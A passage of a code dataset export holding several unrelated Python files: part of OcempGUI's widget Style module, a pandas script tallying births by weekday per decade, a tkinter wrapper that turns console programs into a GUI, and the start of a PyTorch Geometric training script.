-> WidgetStyle.\n\n Creates a deep copy of the WidgetStyle dictionary.\n \"\"\"\n newdict = WidgetStyle ()\n keys = self.keys ()\n for k in keys:\n newdict[copy.deepcopy (k, memo)] = copy.deepcopy (self[k], memo)\n newdict.set_value_changed (self._valuechanged)\n memo [id (self)] = newdict\n return newdict\n \n def __setitem__ (self, i, y):\n \"\"\"W.__setitem__ (i, y) <==> w[i] = y\n \"\"\"\n UserDict.__setitem__ (self, i, y)\n if isinstance (y, WidgetStyle):\n y.set_value_changed (self._valuechanged)\n if self._valuechanged:\n self._valuechanged ()\n\n def __delitem__ (self, y):\n \"\"\"W.__delitem__ (y) <==> del w[y]\n \"\"\"\n UserDict.__delitem__ (self, y)\n if self._valuechanged:\n self._valuechanged ()\n\n def __repr__ (self):\n \"\"\"W.__repr__ () <==> repr (W)\n \"\"\"\n return \"WidgetStyle %s\" % UserDict.__repr__ (self)\n \n def clear (self):\n \"\"\"W.clear () -> None\n\n Remove all items from the WidgetStyle dictionary.\n \"\"\"\n changed = self._valuechanged\n self.set_value_changed (None)\n UserDict.clear (self)\n self.set_value_changed (changed)\n if changed:\n changed ()\n\n def pop (self, k, d=None):\n \"\"\"W.pop (k, d=None) -> object\n\n Remove specified key and return the corresponding value.\n\n If key is not found, d is returned if given, otherwise KeyError\n is raised.\n \"\"\"\n changed = k in self\n v = UserDict.pop (self, k, d)\n if changed and self._valuechanged:\n self._valuechanged ()\n return v\n\n def popitem (self):\n \"\"\"W.popitem () -> (k, v)\n\n Remove and return some (key, value) pair as a 2-tuple\n\n Raises a KeyError if W is empty.\n \"\"\"\n v = UserDict.popitem (self)\n if self._valuechanged:\n self._valuechanged ()\n return v\n\n def setdefault (self, k, d=None):\n \"\"\"W.setdefault (k,d=None) -> W.get (k, d), also set W[k] = d if k not in W\n \"\"\"\n changed = k not in self\n v = UserDict.setdefault (self, k, d)\n if changed and self._valuechanged:\n self._valuechanged ()\n return v\n\n def update (self, E, **F):\n \"\"\"W.update (E, **F) -> None\n\n Update W from E and F.\n\n for k in E: W[k] = E[k] (if E has keys else: for (k, v) in E:\n W[k] = v) then: for k in F: W[k] = F[k]\n \"\"\"\n amount = len (self)\n UserDict.update (self, E, **F)\n if self._valuechanged and (len (self) != amount):\n self._valuechanged ()\n\n def get_value_changed (self):\n \"\"\"W.get_value_changed (...) -> callable\n\n Gets the set callback method for the dictionary changes.\n \"\"\"\n return self._valuechanged\n \n def set_value_changed (self, method):\n \"\"\"W.set_value_changed (...) -> None\n\n Connects a method to invoke, when an item of the dict changes.\n\n Raises a TypeError, if the passed argument is not callable.\n \"\"\"\n if method and not callable (method):\n raise TypeError (\"method must be callable\")\n\n values = self.values ()\n for val in values:\n if isinstance (val, WidgetStyle):\n val.set_value_changed (method)\n self._valuechanged = method\n\nclass Style (object):\n \"\"\"Style () -> Style\n\n Style class for drawing objects.\n\n Style definitions\n -----------------\n Styles are used to change the appearance of the widgets. The drawing\n methods of the Style class will use the specific styles of the\n 'styles' attribute to change the fore- and background colors, font\n information and border settings of the specific widgets. 
The styles\n are set using the lower lettered classname of the widget to draw.\n Additionally the Style class supports cascading styles by falling\n back to the next available class name in the widget its __mro__\n list. If no specific set style could be found for the specific\n widget type, the Style class will use the 'default' style entry of\n its 'styles' dictionary.\n\n Any object can register its own style definition and request it\n using the correct key. A Button widget for example, could register\n its style definition this way:\n\n Style.styles['button'] = WidgetStyle ({ .... })\n\n Any other button widget then will use this style by default, so\n their look is all the same.\n\n It is also possible to pass an own type dictionary to the drawing\n methods of the attached engine class in order to get a surface,\n which can be shown on the screen then:\n\n own_style = WidgetStyle ({ ... })\n surface = style.engine.draw_rect (width, height, own_style)\n\n If the style should be based on an already existing one, the\n copy_style() method can be used to retrieve a copy to work with\n without touching the orignal one:\n\n own_style = style.copy_style (my_button.__class__)\n\n The BaseWidget class offers a get_style() method, which will copy\n the style of the widget class to the specific widget instance. Thus\n you can safely modify the instance specific style for the widget\n without touching the style for all widgets of that class.\n\n The style dictionaries registered within the 'styles' dictionary of\n the Style class need to match some prerequisites to be useful. On\n the one hand they need to incorporate specific key-value pairs,\n which can be evaluated by the various drawing functions, on the\n other they need to have some specific key-value pairs, which are\n evaluated by the Style class.\n\n The following lists give an overview about the requirements the\n style dictionaries have to match, so that the basic Style class can\n work with them as supposed.\n\n Style entries\n -------------\n The registered style WidgetStyle dictionaries for the widgets need\n to contain key-value pairs required by the functions of the\n referenced modules. The following key-value pairs are needed to\n create the surfaces:\n\n bgcolor = WidgetStyle ({ STATE_TYPE : color, ... })\n\n The background color to use for the widget surface.\n\n fgcolor = WidgetStyle ({ STATE_TYPE : color, ... })\n\n The foreground color to use for the widget. This is also the text\n color for widgets, which will display text.\n\n lightcolor = WidgetStyle ({ STATE_TYPE : color, ... })\n darkcolor = WidgetStyle ({ STATE_TYPE : color, ... })\n\n Used to create shadow border effects on several widgets. The color\n values usually should be a bit brighter or darker than the bgcolor\n values.\n\n bordercolor = WidgetStyle ({ STATE_TYPE : color, ... })\n \n Also used to create border effects on several widgets. In contrast\n to the lightcolor and darkcolor entries, this is used, if flat\n borders (BORDER_FLAT) have to drawn.\n\n shadowcolor = (color1, color2)\n\n The colors to use for dropshadow effects. The first tuple entry will\n be used as inner shadow (near by the widget), the second as outer\n shadow value.\n\n image = WidgetStyle ({ STATE_TYPE : string })\n\n Pixmap files to use instead of the background color. 
If the file is\n not supplied or cannot be loaded, the respective bgcolor value is\n used.\n \n font = WidgetStyle ({ 'name' : string, 'size' : integer,\n 'alias' : integer, 'style' : integer })\n\n Widgets, which support the display of text, make use of this\n key-value pair. The 'name' key denotes the font name ('Helvetica')\n or the full path to a font file ('/path/to/Helvetica.ttf'). 'size'\n is the font size to use. 'alias' is interpreted as boolean value for\n antialiasing. 'style' is a bit-wise combination of FONT_STYLE_TYPES\n values as defined in ocempgui.draw.Constants and denotes additional\n rendering styles to use.\n\n shadow = integer\n\n The size of the 3D border effect for a widget.\n\n IMPORTANT: It is important to know, that the Style class only\n supports a two-level hierarchy for styles. Especially the\n copy_style() method is not aware of style entries of more than two\n levels. This means, that a dictionary in a style dictionary is\n possible (as done in the 'font' or the various color style entries),\n but more complex style encapsulations are unlikely to work\n correctly.\n Some legal examples for user defined style entries:\n\n style['ownentry'] = 99 # One level\n style['ownentry'] = { 'foo' : 1, 'bar' : 2 } # Two levels: level1[level2]\n\n This one however is not guaranteed to work correctly and thus should\n be avoided:\n\n style['ownentry'] = { 'foo' : { 'bar' : 1, 'baz' : 2 }, 'foobar' : { ... }}\n\n Dicts and WidgetStyle\n ---------------------\n\n OcempGUI uses a WidgetStyle dictionary class to keep track of\n changes within styles and to update widgets on th fly on changing\n those styles. When you are creating new style files (as explained in\n the next section) you do not need to explicitly use the\n WidgetStyle() dictionary, but can use plain dicts instead. Those\n will be automatically replaced by a WidgetStyle on calling load().\n\n You should however avoid using plain dicts if you are modifying\n styles of widgets or the Style class at run time and use a\n WidgetStyle instead:\n\n # generate_new_style() returns a plain dict.\n style = generate_new_style ()\n button.style = WidgetStyle (style)\n\n Style files\n -----------\n A style file is a key-value pair association of style entries for\n widgets. It can be loaded and used by the Style.load() method to set\n specific themes and styles for the widgets. The style files use the\n python syntax and contain key-value pairs of style information for\n the specific widgets. The general syntax looks like follows:\n\n widgetclassname = WidgetStyle ({ style_entry : { value } })\n\n An example style file entry for the Button widget class can look\n like the following:\n\n button = { 'bgcolor' :{ STATE_NORMAL : (200, 100, 0) },\n 'fgcolor' : { STATE_NORMAL : (255, 0, 0) },\n 'shadow' : 5 }\n\n The above example will set the bgcolor[STATE_NORMAL] color style\n entry for the button widget class to (200, 100, 0), the\n fgcolor[STATE_NORMAL] color style entry to (255, 0, 0) and the\n 'shadow' value for the border size to 5. Any other value of the\n style will remain untouched.\n\n Loading a style while running an application does not have any\n effect on widgets\n\n * with own styles set via the BaseWidget.get_style() method,\n * already drawn widgets using the default style.\n \n The latter ones need to be refreshed via the set_dirty()/update()\n methods explicitly to make use of the new style.\n \n Style files allow user-defined variables, which are prefixed with an\n underscore. 
A specific color thus can be stored in a variable to allow\n easier access of it.\n \n _red = (255, 0, 0)\n ___myown_font = 'foo/bar/font.ttf'\n\n Examples\n --------\n The OcempGUI module contains a file named 'default.rc' in the themes\n directory of the installation, which contains several style values\n for the default appearance of the widgets. Additional information\n can be found in the manual of OcempGUI, too.\n\n Attributes:\n styles - A dictionary with the style definitions of various elements.\n engine - The drawing engine, which takes care of drawing elements.\n \"\"\"\n\n __slots__ = [\"styles\", \"_engine\"]\n \n def __init__ (self):\n # Initialize the default style.\n self.styles = {\n \"default\" : WidgetStyle ({\n \"bgcolor\" : WidgetStyle ({ STATE_NORMAL : (234, 228, 223),\n STATE_ENTERED : (239, 236, 231),\n STATE_ACTIVE : (205, 200, 194),\n STATE_INSENSITIVE : (234, 228, 223) }),\n \"fgcolor\" : WidgetStyle ({ STATE_NORMAL : (0, 0, 0),\n STATE_ENTERED : (0, 0, 0),\n STATE_ACTIVE : (0, 0, 0),\n STATE_INSENSITIVE : (204, 192, 192) }),\n \"lightcolor\" : WidgetStyle ({ STATE_NORMAL : (245, 245, 245),\n STATE_ENTERED : (245, 245, 245),\n STATE_ACTIVE : (30, 30, 30),\n STATE_INSENSITIVE : (240, 240, 240)\n }),\n \"darkcolor\" : WidgetStyle ({ STATE_NORMAL : (30, 30, 30),\n STATE_ENTERED : (30, 30, 30),\n STATE_ACTIVE : (245, 245, 245),\n STATE_INSENSITIVE : (204, 192, 192)\n }),\n \"bordercolor\" : WidgetStyle ({ STATE_NORMAL : (0, 0, 0),\n STATE_ENTERED : (0, 0, 0),\n STATE_ACTIVE : (0, 0, 0),\n STATE_INSENSITIVE : (204, 192, 192)\n }),\n \"shadowcolor\" : ((100, 100, 100), (130, 130, 130)),\n \"image\" : WidgetStyle ({ STATE_NORMAL : None,\n STATE_ENTERED : None,\n STATE_ACTIVE : None,\n STATE_INSENSITIVE : None }),\n \"font\" : WidgetStyle ({ \"name\" : None,\n \"size\" : 16,\n \"alias\" : True,\n \"style\" : 0 }),\n \"shadow\" : 2 })\n }\n\n # Load the default style and theme engine.\n self.load (os.path.join (DEFAULTDATADIR, \"themes\", \"default\",\n default.RCFILE))\n self.set_engine (default.DefaultEngine (self))\n\n def get_style (self, cls):\n \"\"\"S.get_style (...) -> WidgetStyle\n \n Returns the style for a specific widget class.\n\n Returns the style for a specific widget class. If no matching\n entry was found, the method searches for the next upper\n entry of the class's __mro__. If it reaches the end of the\n __mro__ list without finding a matching entry, the\n default style will be returned.\n \"\"\"\n classes = [c.__name__.lower () for c in cls.__mro__]\n for name in classes:\n if name in self.styles:\n return self.styles[name]\n return self.styles.setdefault (cls.__name__.lower (), WidgetStyle ())\n\n def get_style_entry (self, cls, style, key, subkey=None):\n \"\"\"S.get_style_entry (...) -> value\n\n Gets a style entry from the style dictionary.\n\n Gets a entry from the style dictionary. If the entry could not\n be found, the method searches for the next upper entry of the\n __mro__. 
If it reaches the end of the __mro__ list without\n finding a matching entry, it will try to return the entry from\n the 'default' style dictionary.\n \"\"\"\n deeper = subkey != None\n if key in style:\n if deeper:\n if subkey in style[key]:\n return style[key][subkey]\n else:\n return style[key]\n\n styles = self.styles\n classes = [c.__name__.lower () for c in cls.__mro__]\n for name in classes:\n if name in styles:\n style = styles[name]\n # Found a higher level class style, check it.\n if key in style:\n if deeper:\n if subkey in style[key]:\n return style[key][subkey]\n else:\n return style[key]\n\n # None found, refer to the default.\n if deeper:\n return styles[\"default\"][key][subkey]\n return styles[\"default\"][key]\n\n def copy_style (self, cls):\n \"\"\"S.copy_style (...) -> WidgetStyle\n\n Creates a plain copy of a specific style.\n\n Due to the cascading ability of the Style class, an existing\n style will be filled with the entries of the 'default' style\n dictionary which do not exist in it.\n \"\"\"\n style = copy.deepcopy (self.get_style (cls))\n default = self.styles[\"default\"]\n for key in default:\n if key not in style:\n style[key] = copy.deepcopy (default[key])\n else:\n sub = default[key]\n # No dicts anymore\n for subkey in default[key]:\n style[key][subkey] = copy.deepcopy (sub[subkey])\n return style\n \n def load (self, file):\n \"\"\"S.load (...) -> None\n\n Loads style definitions from a file.\n\n Loads style definitions from a file and adds them to the\n 'styles' attribute. Already set values in this dictionary will\n be overwritten.\n \"\"\"\n glob_dict = {}\n loc_dict = {}\n exec (open(file).read(), glob_dict, loc_dict)\n setdefault = self.styles.setdefault\n for key in loc_dict:\n # Skip the Constants import directive and\n # any user-defined variable.\n if key.startswith (\"_\") or (key == \"Constants\"): \n continue\n\n # Search the style or create a new one from scratch.\n entry = setdefault (key, WidgetStyle ())\n\n # Look up all entries of our style keys and add them to the\n # style.\n widget = loc_dict[key]\n for key in widget:\n if type (widget[key]) == dict:\n if key not in entry:\n entry[key] = WidgetStyle ()\n for subkey in widget[key]:\n entry[key][subkey] = widget[key][subkey]\n else:\n entry[key] = widget[key]\n\n def create_style_dict (self):\n \"\"\"Style.create_style_dict () -> dict\n\n\tCreates a new style dictionary.\n\n Creates a new unfilled style dictionary with the most necessary\n entries needed by the Style class specifications.\n \"\"\"\n style = WidgetStyle ({\n \"bgcolor\" : WidgetStyle ({ STATE_NORMAL : (0, 0, 0),\n STATE_ENTERED : (0, 0, 0),\n STATE_ACTIVE : (0, 0, 0),\n STATE_INSENSITIVE : (0, 0, 0) }),\n \"fgcolor\" : WidgetStyle ({ STATE_NORMAL : (0, 0, 0),\n STATE_ENTERED : (0, 0, 0),\n STATE_ACTIVE : (0, 0, 0),\n STATE_INSENSITIVE : (0, 0, 0) }),\n \"lightcolor\" : WidgetStyle ({ STATE_NORMAL : (0, 0, 0),\n STATE_ENTERED : (0, 0, 0),\n STATE_ACTIVE : (0, 0, 0),\n STATE_INSENSITIVE : (0, 0, 0) }),\n \"darkcolor\" : WidgetStyle ({ STATE_NORMAL : (0, 0, 0),\n STATE_ENTERED : (0, 0, 0),\n STATE_ACTIVE : (0, 0, 0),\n STATE_INSENSITIVE : (0, 0, 0) }),\n \"bordercolor\" : WidgetStyle ({ STATE_NORMAL : (0, 0, 0),\n STATE_ENTERED : (0, 0, 0),\n STATE_ACTIVE : (0, 0, 0),\n STATE_INSENSITIVE : (0, 0, 0) }),\n \"shadowcolor\": ((0, 0, 0), (0, 0, 0)),\n \"image\" : WidgetStyle ({ STATE_NORMAL : None,\n STATE_ENTERED : None,\n STATE_ACTIVE : None,\n STATE_INSENSITIVE : None }),\n \"font\" : WidgetStyle ({ \"name\" : None,\n 
\"size\" : 0,\n \"alias\" : False,\n \"style\" : 0 }),\n \"shadow\" : 0\n })\n return style\n\n def get_border_size (self, cls=None, style=None, bordertype=BORDER_FLAT):\n \"\"\"S.get_border_size (...) -> int\n\n Gets the border size for a specific border type and style.\n\n Gets the size of a border in pixels for the specific border type\n and style. For BORDER_NONE the value will be 0 by\n default. BORDER_FLAT will always return a size of 1.\n The sizes of other border types depend on the passed style.\n\n If no style is passed, the method will try to retrieve a style\n using the get_style() method.\n\n Raises a ValueError, if the passed bordertype argument is\n not a value of the BORDER_TYPES tuple.\n \"\"\"\n if bordertype not in BORDER_TYPES:\n raise ValueError (\"bordertype must be a value from BORDER_TYPES\")\n\n if not style:\n style = self.get_style (cls)\n\n if bordertype == BORDER_FLAT:\n return 1\n elif bordertype in (BORDER_SUNKEN, BORDER_RAISED):\n return self.get_style_entry (cls, style, \"shadow\")\n elif bordertype in (BORDER_ETCHED_IN, BORDER_ETCHED_OUT):\n return self.get_style_entry (cls, style, \"shadow\") * 2\n return 0\n\n def set_engine (self, engine):\n \"\"\"S.set_engine (...) -> None\n\n Sets the drawing engine to use for drawing elements.\n \"\"\"\n if engine is None:\n raise TypeError (\"engine must not be None\")\n self._engine = engine\n\n engine = property (lambda self: self._engine,\n lambda self, var: self.set_engine (var),\n doc = \"The drawing engine, which draws elements.\")\n","sub_path":"ocempgui/widgets/Style.py","file_name":"Style.py","file_ext":"py","file_size_in_byte":25284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"532924353","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 17 15:18:38 2019\n\n@author: marti\n\"\"\"\n\nimport pandas as pd\nimport datetime as dt \n\nbirths = pd.read_csv('births.csv')\nbirths = births.dropna() # drop na data \n\ndef is_leap(year) : # test whether or not year is a leap year (full Gregorian rule)\n return year%4 == 0 and (year%100 != 0 or year%400 == 0)\n\n###### drop nonsense dates from births df ########\n \nlabels = [] # labels to drop from the dataset\nthirty_one = [1,3,5,7,8,10,12]\nthirty = [4,6,9,11]\nfor i in range(len(births)) : \n if births['month'][i] == 2 : # in February\n if is_leap(births['year'][i]) : # in leap_year\n if births['day'][i] > 29 : \n labels.append(i)\n else :\n if births['day'][i] > 28 : \n labels.append(i)\n \n if births['month'][i] in thirty : # in 30 days' months\n if births['day'][i] > 30 : \n labels.append(i)\n \n if births['month'][i] in thirty_one : # in 31 days' months\n if births['day'][i] > 31 : \n labels.append(i)\n \nbirths = births.drop(labels, axis='index') # drop nonsense rows\n\n##### transform year, month, day columns to a single date column ######\n\ndate = {'date':[]}\nfor index in births.index: # create date Series\n date['date'].append(dt.date(births['year'][index],\n births['month'][index],\n int(births['day'][index])))\n # date is now a datetime Series \n\ndate = pd.DataFrame(date) # date is now a df so we can merge \n\nbirths_transformed = pd.merge(births.copy()[['gender','births']], date,\n left_on=births.index, right_on = date.index)\n\ndel births_transformed['key_0']\n\n## group the data by date and aggregate male and female births by date ##\ngb = births_transformed.groupby('date')['births'].sum()\ngb = pd.DataFrame(gb)\n\n##### extract 3 dataframes : 60s, 70s, 80s ######\n\n# before 1970, January, the 1st\nsixties = gb[gb.index.values < dt.date(1970, 1, 1)]\n\n# between 
1970, January, the 1st and 1980, January, the 1st\nseventies = gb[~(dt.date(1970, 1, 1) <= gb.index.values) ^ \n (gb.index.values < dt.date(1980, 1, 1))] \n# not-xor to achieve boolean array conjunction\n\n# after 1980, January, the 1st\nheighties = gb[gb.index.values >= dt.date(1980, 1, 1)]\n\n#### add a new column 'weekDay' in each DataFrame ####\n\nweekDays = ['Monday', 'Tuesday', 'Wednesday', 'Thursday',\n 'Friday', 'Saturday', 'Sunday']\n\ndfs = [sixties, seventies, heighties]\n\nfor i in range(len(dfs)) : \n temp = {'weekDay' : []}\n for date in dfs[i].index : # we fill temp with weekDay values\n temp['weekDay'].append(weekDays[date.weekday()]) # date.weekday()\n temp_df = pd.DataFrame(temp) # returns an int (0 -> 6)\n dfs[i] = pd.merge(dfs[i], temp_df, on=dfs[i].index)\n\n#### group by weekDay then aggregate 'births' (sum) #####\n \ndfs[0] = pd.DataFrame(dfs[0].groupby('weekDay')['births'].sum())\ndfs[1] = pd.DataFrame(dfs[1].groupby('weekDay')['births'].sum())\ndfs[2] = pd.DataFrame(dfs[2].groupby('weekDay')['births'].sum())\n\n#### sorting the data by weekDay ####\nfor i in range(len(dfs)) : \n df = dfs[i].copy()\n df.index = weekDays\n for day in weekDays : \n df['births'][day] = dfs[i]['births'][day]\n dfs[i] = df \n \nsixties = dfs[0]\nseventies = dfs[1]\nheighties = dfs[2]\n\n####### extract DataFrame to CSV ##########\nsixties.to_csv(path_or_buf = '60s.csv')\nseventies.to_csv(path_or_buf = '70s.csv')\nheighties.to_csv(path_or_buf = '80s.csv')","sub_path":"transformation_csv.py","file_name":"transformation_csv.py","file_ext":"py","file_size_in_byte":3494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"314513001","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Nov 1 12:14:20 2019\r\n\r\n@author: SakataWoolley\r\n\"\"\"\r\n\r\n\"\"\"\r\nLibrary for quickly converting a console application into a gui application.\r\nIncludes threading and queues, custom commands, and redirecting stdout.\r\n\"\"\"\r\nimport sys\r\nimport queue\r\nimport threading\r\nfrom tkinter import *\r\nfrom tkinter import ttk\r\nfrom tkinter import scrolledtext\r\n\r\n\r\nclass TScrolledText(scrolledtext.ScrolledText):\r\n \"\"\"\r\n Modified ScrolledText widget to include queue, methods to redirect stdout, and auto-disable editing.\r\n \"\"\"\r\n def __init__(self, master, **options):\r\n scrolledtext.ScrolledText.__init__(self, master, **options)\r\n self.text_queue = queue.Queue()\r\n self.update_me()\r\n\r\n def write(self, line):\r\n \"\"\"\r\n This replaces stdout.write\r\n \"\"\"\r\n self.text_queue.put(line)\r\n\r\n def clear(self):\r\n self.config(state=\"normal\")\r\n self.delete(1.0, END)\r\n self.config(state=\"disabled\")\r\n\r\n def flush(self):\r\n \"\"\"\r\n This replaces stdout.flush\r\n Unused by queue\r\n \"\"\"\r\n pass\r\n\r\n def update_me(self):\r\n if not self.text_queue.empty():\r\n line = self.text_queue.get_nowait()\r\n self[\"state\"] = \"normal\"\r\n self.insert(END, str(line))\r\n self[\"state\"] = \"disabled\"\r\n self.see(END)\r\n self.update_idletasks()\r\n else:\r\n pass\r\n self.after(100, self.update_me)\r\n\r\n\r\nclass CmdGUI:\r\n \"\"\"\r\n Handles gui creation and interactions\r\n \"\"\"\r\n def __init__(self):\r\n self.commands = {\"help\": self.help_menu, \"themes\": self.list_themes} # Commands to run when nothing is running\r\n self.defaults = {} # Commands always available (during loops)\r\n self.loop_in_progress = False\r\n self.wintitle = \"CmdGUI Window\"\r\n\r\n # Create main window # TODO: Custom 
Themes\r\n self.root = Tk()\r\n self.root.title(self.wintitle)\r\n self.root.grid()\r\n self.root.columnconfigure(0, weight=1)\r\n self.root.rowconfigure(0, weight=1)\r\n self.root.minsize(width=472, height=348)\r\n\r\n # Create Frame covering entire window (for styling, no practical use)\r\n self.mainframe = ttk.Frame(self.root, padding=(5, 5, 5, 5), borderwidth=5, relief=\"groove\")\r\n self.mainframe.grid(column=0, row=0, sticky=(N, W, E, S))\r\n self.mainframe.columnconfigure(0, weight=2)\r\n self.mainframe.rowconfigure(0, weight=2)\r\n\r\n # Create Frame containing output text area\r\n self.outframe = ttk.Frame(self.mainframe, padding=(3, 3, 3, 3))\r\n self.outframe.grid(column=0, row=0, sticky=(N, W, E, S))\r\n self.outframe.columnconfigure(0, weight=2)\r\n self.outframe.rowconfigure(0, weight=2)\r\n\r\n # Create Frame containing input text area\r\n self.inframe = ttk.Frame(self.mainframe, padding=(3, 3, 3, 3))\r\n self.inframe.grid(column=0, row=1, sticky=(N, W, E, S))\r\n self.inframe.columnconfigure(0, weight=2)\r\n self.inframe.rowconfigure(0, weight=2)\r\n\r\n # Create Text output widget\r\n self.txtoutput = TScrolledText(self.outframe, wrap=\"word\", state=\"disabled\")\r\n self.txtoutput.grid(column=0, row=0, sticky=(N, W, E, S))\r\n self.commands['clear'] = self.txtoutput.clear\r\n\r\n # Create label for user messages\r\n self.usermsg = StringVar()\r\n self.usermsg.set(\"Please enter a command. (type help for a list)\")\r\n self.usermsg_traceid = self.usermsg.trace(\"w\", self.reset_msg)\r\n self.msglabel = Label(self.inframe, textvariable=self.usermsg)\r\n self.msglabel.grid(column=0, row=0, sticky=(W, N, E))\r\n\r\n # Create Text input widget\r\n self.txtinput = Text(self.inframe, height=4, wrap=\"word\")\r\n self.txtinput.grid(column=0, row=1, sticky=(W, E, S))\r\n self.txtinput.bind(\"<Return>\", self.onenter) # Send command when pressing enter\r\n\r\n # Create enter/submit button\r\n self.enterbutton = Button(self.inframe, text=\"Enter\", command=self.onenter)\r\n self.enterbutton.grid(column=1, row=1, sticky=(N, W, E, S))\r\n\r\n # Redirect stdout to gui\r\n sys.stdout = self.txtoutput\r\n sys.stderr = sys.stdout\r\n\r\n self.txtinput.focus_set()\r\n\r\n self.theme = ttk.Style()\r\n self.theme.theme_use('alt')\r\n\r\n def onenter(self, event=None): # TODO: Explore creating commands using a class\r\n \"\"\"\r\n Sends the value (function) of key (command) to be run by proc_exec.\r\n \"\"\"\r\n cmd = self.txtinput.get(\"1.0\", \"1.0 wordend\").strip().lower()\r\n cmd_arg = self.txtinput.get(\"1.0 wordend +1c\", \"end -1c\")\r\n if cmd in self.commands.keys() and not self.loop_in_progress:\r\n self.proc_exec(self.commands[cmd], arg=cmd_arg)\r\n elif cmd in self.defaults.keys():\r\n self.proc_exec(self.defaults[cmd], arg=cmd_arg)\r\n else:\r\n self.usermsg.set(\"Invalid Command\")\r\n self.txtinput.delete(1.0, END)\r\n return 'break'\r\n\r\n def proc_exec(self, task, arg=None):\r\n \"\"\"\r\n Runs designated function with threading\r\n \"\"\"\r\n if arg is None or arg == \"\":\r\n tp = threading.Thread(target=task)\r\n else:\r\n tp = threading.Thread(target=task, args=(arg,))\r\n tp.start()\r\n\r\n def reset_msg(self, *args):\r\n \"\"\"\r\n Changes msglabel for 3 seconds, then back.\r\n \"\"\"\r\n self.usermsg.trace_vdelete(\"w\", self.usermsg_traceid)\r\n t_msg = threading.Timer(3.0, self.reset_msg2)\r\n t_msg.start()\r\n\r\n def reset_msg2(self):\r\n self.usermsg.set(\"Please enter a command. 
(type help for a list)\")\r\n self.usermsg_traceid = self.usermsg.trace(\"w\", self.reset_msg)\r\n\r\n def help_menu(self):\r\n self.txtoutput.clear()\r\n print(\"Regular commands list:\")\r\n print(list(self.commands.keys()))\r\n print(\"Special commands list:\")\r\n print(list(self.defaults.keys()))\r\n\r\n def list_themes(self):\r\n print(self.theme.theme_names())\r\n\r\n\r\n\"\"\"\r\nThe below code is included as a demo of the library.\r\n\"\"\"\r\nif __name__ == \"__main__\":\r\n from time import strftime\r\n\r\n demo = CmdGUI()\r\n demo.wintitle = \"CmdGUI Demo\" # Sets the main window title\r\n stop = False\r\n\r\n def infloop_test():\r\n \"\"\"\r\n An example of running a looping function with tkinter\r\n Sets the initial time display.\r\n With infloop_test2\r\n \"\"\"\r\n demo.txtoutput.clear()\r\n print(strftime(\"%a - %b %d, %Y %H:%M:%S\"))\r\n demo.usermsg.set(\"Type stop and press enter to stop the loop.\")\r\n infloop_test2()\r\n\r\n def infloop_test2():\r\n \"\"\"\r\n Updates the time display every 500ms until stop command is given.\r\n \"\"\"\r\n global stop\r\n demo.loop_in_progress = True\r\n\r\n if not stop:\r\n curtime = strftime(\"%a - %b %d, %Y %H:%M:%S\")\r\n time_display = demo.txtoutput.get(1.0, 1.28) # Read all characters on the first line\r\n curtime = list(curtime)\r\n time_display = list(time_display)\r\n for index, char in enumerate(time_display):\r\n if curtime[index] != time_display[index]:\r\n cursor = \"1.{0}\".format(index) # Use number of current character as column index\r\n demo.txtoutput.config(state=\"normal\")\r\n demo.txtoutput.delete(cursor) # Delete char at cursor\r\n demo.txtoutput.insert(cursor, curtime[index]) # Insert new char, if changed at cursor\r\n demo.txtoutput.config(state=\"disabled\")\r\n demo.txtoutput.after(500, infloop_test2) # Calls infloop_test2 over again after 500ms\r\n else:\r\n demo.usermsg.set(\"Time loop has been stopped.\")\r\n demo.loop_in_progress = False\r\n stop = False\r\n\r\n def end_loop():\r\n \"\"\"\r\n Used to change global variable stop to True for stopping loops.\r\n \"\"\"\r\n global stop\r\n stop = True\r\n\r\n def forloop_test():\r\n for i in range(10):\r\n print(\"This is step \" + str(i) + \".\")\r\n\r\n def say(*args): # Very basic attempt at using arguments with commands, treats anything after say as text\r\n\r\n print(*args)\r\n\r\n\r\n # Create commands to be typed to run each function\r\n demo.commands['infloop'] = infloop_test\r\n demo.defaults[\"stop\"] = end_loop\r\n demo.commands['forloop'] = forloop_test\r\n demo.commands['say'] = say\r\n\r\n demo.root.mainloop()","sub_path":"ThreadingExample.py","file_name":"ThreadingExample.py","file_ext":"py","file_size_in_byte":8570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"517490497","text":"# system imports\nimport pickle\nimport numpy as np\nfrom warnings import warn\nimport random\nimport json\nfrom datetime import datetime\nimport time\nimport os\nfrom pprint import pprint\nimport tqdm\n\n# pytorch imports\nimport torch\nfrom torch.nn import L1Loss\nfrom torch_geometric.data import Data\n\n# Custom imports\nfrom helpers import mol2graph\nfrom helpers.EarlyStopping import EarlyStopping\nfrom helpers.scale import normalize\nfrom GraphNet import UnweightedDebruijnGraphNet\n\nassert torch.__version__ == \"1.5.0\" # Needed for pytorch-geometric\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nif device == \"cpu\":\n warn(\"You are using CPU instead of CUDA. 
The computation will be longer...\")\n\n\nseed = 7123\n# seed = 76583\nrandom.seed(seed)\ntorch.manual_seed(seed)\n\n# Data parameters\nDATASET_TYPE = \"old\"\nDATA_DIR = f\"ala_dipep_{DATASET_TYPE}\"\nTARGET_FILE = f\"free-energy-{DATASET_TYPE}.dat\"\nN_SAMPLES = 3815 if DATASET_TYPE == \"small\" else 21881 if DATASET_TYPE == \"medium\" else 50000 if DATASET_TYPE == \"old\" else 64074 if DATASET_TYPE == \"big\" else 48952\nNORMALIZE_DATA = True\nNORMALIZE_TARGET = True\nOVERWRITE_PICKLES = False\nUNSEEN_REGION = None # can be \"left\", \"right\" or None. When is \"left\" we train on \"right\" and predict on \"left\"\n\nif not OVERWRITE_PICKLES:\n warn(\"You are using existing pickles, change this setting if you add features to nodes/edges \")\n\n# Parameters\nrun_parameters = {\n \"graph_type\": \"De Bruijn\",\n \"out_channels\": 4,\n \"convolution\": \"GraphConv\",\n \"convolutions\": 3,\n \"learning_rate\": 0.0001 if NORMALIZE_TARGET else 0.001,\n \"epochs\": 2000,\n \"patience\": 70,\n \"normalize_target\": NORMALIZE_TARGET,\n \"dataset_perc\": 1,\n \"shuffle\": False,\n \"train_split\": 0.7,\n \"validation_split\": 0.1,\n \"unseen_region\": UNSEEN_REGION\n}\n\n# To check config at the beginning\npprint(run_parameters)\n\nif run_parameters[\"dataset_perc\"] < 1:\n warn(\"You are not using the 